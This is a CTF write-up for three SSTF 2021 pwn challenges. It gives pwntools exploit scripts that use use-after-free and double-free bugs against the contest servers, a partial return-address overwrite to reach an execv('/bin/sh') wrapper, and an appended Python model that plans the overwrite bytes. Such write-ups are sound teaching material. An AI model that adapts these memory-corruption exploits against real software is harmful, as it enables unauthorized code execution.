CTF Write-Up
[SSTF 2021] Hackers Playground Writeup
bjloed
2021. 8. 18. 02:22
🧡 LostArk
A simple UAF (use-after-free) problem 😉
from pwn import *

context.log_level = 'debug'
#p = process('./lostark')
p = remote('lostark.sstf.site', 1337)

def create(idx, name):            # menu 1: create a character in slot idx
    p.sendlineafter(':', '1')
    p.sendlineafter(':', str(idx))
    if idx != 7:                  # slot 7 is not prompted for a name
        p.sendlineafter(':', name)

def delete(idx):                  # menu 2: delete slot idx
    p.sendlineafter(':', '2')
    p.sendlineafter(':', str(idx))

def choose(idx):                  # menu 4: select slot idx as the current character
    p.sendlineafter(':', '4')
    p.sendlineafter(':', str(idx))

def set_skill(idx):               # menu 5: set skill idx
    p.sendlineafter(':', '5')
    p.sendlineafter(':', str(idx))

def use_skill():                  # menu 6: use the skill
    p.sendlineafter(':', '6')

create(7, None)      # slot 7 takes no name
delete(0)            # free slot 0; its pointer is left dangling (the UAF)
create(1, 'AAAA')    # allocate again so the freed chunk is reused, with 'AAAA' as its contents
choose(0)            # select slot 0 through the dangling pointer
use_skill()          # act on the stale object
p.interactive()
🧡 LostArk2
Careless use of shared pointers, plus a UAF and a double free (DFB)!
from pwn import *

context.log_level = 'debug'
#p = process('./patch')
p = remote('lostark2.sstf.site', 1337)

def create(idx, name):            # menu 1: create a character in slot idx
    p.sendlineafter(':', '1')
    p.sendlineafter(':', str(idx))
    if idx != 7:                  # slot 7 is not prompted for a name
        p.sendlineafter(':', name)

def delete(idx):                  # menu 2: delete slot idx
    p.sendlineafter(':', '2')
    p.sendlineafter(':', str(idx))

def choose(idx):                  # menu 4: select slot idx as the current character
    p.sendlineafter(':', '4')
    p.sendlineafter(':', str(idx))

def set_skill(idx):               # menu 5: set skill idx
    p.sendlineafter(':', '5')
    p.sendlineafter(':', str(idx))

def use_skill():                  # menu 6: use the skill
    p.sendlineafter(':', '6')

create(1, 'AAAA')    # allocate slot 1
choose(0)            # select slot 0
set_skill(1)         # set skill 1 on the selected slot (the carelessly shared pointer)
delete(0)            # free slot 0 while the skill still refers to it
create(7, None)      # slot 7 takes no name
create(2, 'BBBB')    # allocate again so the freed memory is reused, with 'BBBB' as its contents
choose(0)            # select slot 0 through the stale pointer (UAF)
use_skill()          # act on the stale object
p.interactive()
🧡 Cyberpunk
The setup is a game played with a joystick: you pick from the offsets shown on screen, and each picked value is written into the buffer at rbp-0x8. At first glance it looks like at most 8 cells can be filled, but if you keep feeding values the write continues past the buffer and overflows the stack. The binary is PIE, so the saved return address (which points back into the binary) and the address of the execv function FUN_00100b5a differ only in their lower 2 bytes; overwriting just those 2 bytes solves the challenge. As the decompiled fill routine below shows, every cell of the grid is a non-zero byte of either system() or FUN_00100b5a, so the byte values you need are the ones on screen. There is no separate payload script.
void FUN_00100dca(long param_1)
{
    byte bVar1;
    uint uVar2;
    int iVar3;
    code *pcVar4;
    int local_20;
    int local_1c;

    local_20 = 0;
    while (local_20 < 6) {
        local_1c = 0;
        while (local_1c < 6) {
            do {
                uVar2 = rand();
                if ((uVar2 & 1) == 0) {
                    pcVar4 = system;
                }
                else {
                    pcVar4 = FUN_00100b5a; // execv("/bin/sh")
                }
                iVar3 = rand();
                bVar1 = (byte)(iVar3 >> 0x37);
                // cell = byte (rand() % 8) of the chosen function's address
                *(char *)(param_1 + (local_1c + local_20 * 6)) =
                    (char)((long)pcVar4 >>
                           ((((char)iVar3 + (bVar1 >> 5) & 7) - (bVar1 >> 5)) * '\b' & 0x3f));
            } while (*(char *)(param_1 + (local_1c + local_20 * 6)) == '\0'); // reject zero bytes
            local_1c = local_1c + 1;
        }
        local_20 = local_20 + 1;
    }
    return;
}
(Cyberpunk title banner, drawn in Braille characters, omitted)
Game screen from the challenge: the 8-byte buffer at rbp-0x8, the sequence of cells picked so far, and the grid of selectable bytes:
[ 00 00 00 00 00 00 00 00 ]
┌───┐
┤#F4├──E3───7F───5A───E3───E3─
└───┘
5A E8 D0 55 5A 74
D0 F4 5A E8 55 E8
D0 98 E3 5A 74 6B
7F E3 E3 6B 7F D0
74 74 F4 98 7F 55
$>
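The following is an added example, not code from the write-up or the challenge: it models the grid fill from the decompiled FUN_00100dca and shows why the grid is an address leak you can plan the overflow from. It assumes the low 12 bits of the execv wrapper are 0xb5a (Ghidra names FUN_00100b5a by its address at the default image base 0x100000, and a page-aligned PIE base keeps those bits), that the 8-byte buffer at rbp-0x8 and the saved rbp lie between the first pick and the saved return address (so 16 filler bytes come first), and the two addresses used for the simulation are constructed, not the real run's.

```python
from __future__ import annotations
import random

# Added example, not code from the write-up.  Assumptions are marked.
GRID_ROWS, GRID_COLS = 6, 6     # loop bounds in FUN_00100dca
EXECV_OFFSET_LOW12 = 0xB5A      # assumption: low 12 bits of FUN_00100b5a survive the PIE slide
FILLER_LEN = 16                 # assumption: 8-byte buffer at rbp-0x8 plus saved rbp before RET

# Grid transcribed from the screen capture in the write-up (rows top to bottom).
PAGE_GRID = [
    [0x5A, 0xE8, 0xD0, 0x55, 0x5A, 0x74],
    [0xD0, 0xF4, 0x5A, 0xE8, 0x55, 0xE8],
    [0xD0, 0x98, 0xE3, 0x5A, 0x74, 0x6B],
    [0x7F, 0xE3, 0xE3, 0x6B, 0x7F, 0xD0],
    [0x74, 0x74, 0xF4, 0x98, 0x7F, 0x55],
]


def addr_byte(addr: int, index: int) -> int:
    """Byte `index` (0 = least significant) of a 64-bit address."""
    return (addr >> (8 * index)) & 0xFF


def fill_grid(system_addr: int, execv_addr: int, rng: random.Random) -> list[list[int]]:
    """Model of FUN_00100dca: every cell receives a random non-zero byte of
    either system() or the execv wrapper, taken from a random byte position
    (rand() % 8).  The do/while in the decompile rejects zero bytes, so the
    zero high bytes of a canonical user-space address never show up and
    every cell is a genuine byte of one of the two addresses."""
    grid = []
    for _ in range(GRID_ROWS):
        row = []
        for _ in range(GRID_COLS):
            while True:                                   # do { ... } while (cell == 0)
                target = system_addr if rng.getrandbits(1) == 0 else execv_addr
                value = addr_byte(target, rng.randrange(8))   # ((rand() % 8) * 8) & 0x3f
                if value != 0:
                    break
            row.append(value)
        grid.append(row)
    return grid


def grid_bytes(grid) -> set[int]:
    return {b for row in grid for b in row}


def candidate_second_bytes(grid, offset_low12: int) -> list[int]:
    """The target's lowest byte is fixed by the binary; its second byte is
    0x?b where ? is the one nibble of the PIE slide that the low 2 bytes
    depend on.  Because the grid is built from the real address, that byte
    is on screen: return every grid byte whose low nibble matches.  More
    than one candidate means a system() byte collides and you must pick."""
    nibble = (offset_low12 >> 8) & 0xF
    return sorted(b for b in grid_bytes(grid) if b & 0xF == nibble)


def plan_picks(grid, target_low16: int, filler_len: int = FILLER_LEN) -> list[int] | None:
    """Byte values to select in order: filler to cross the buffer and the
    saved rbp, then the two low bytes of the return address, low byte first
    (little-endian).  None if a needed byte is not on the screen."""
    present = grid_bytes(grid)
    lo, hi = target_low16 & 0xFF, (target_low16 >> 8) & 0xFF
    if lo not in present or hi not in present:
        return None
    filler = min(present)                                  # any on-screen byte will do
    return [filler] * filler_len + [lo, hi]


if __name__ == "__main__":
    # Constructed addresses: chosen so their non-zero bytes are the values on
    # the screenshot; the real run's addresses are not known.
    SYSTEM_ADDR, EXECV_ADDR = 0x7F98F4E8D074, 0x55E3D07F6B5A
    sim = fill_grid(SYSTEM_ADDR, EXECV_ADDR, random.Random(2021))
    print("simulated grid:", [[f"{b:02X}" for b in r] for r in sim])
    cands = candidate_second_bytes(PAGE_GRID, EXECV_OFFSET_LOW12)
    print("second-byte candidates from the screenshot:", [f"{b:02X}" for b in cands])
    low16 = (cands[0] << 8) | (EXECV_OFFSET_LOW12 & 0xFF)
    print("picks:", [f"{b:02X}" for b in plan_picks(PAGE_GRID, low16)])
```

On the screenshot grid only 0x6B has a low nibble of 0xb, so the partial overwrite is 5A then 6B after 16 filler picks; on a different run the grid changes with the slide, and the same lookup gives the new byte.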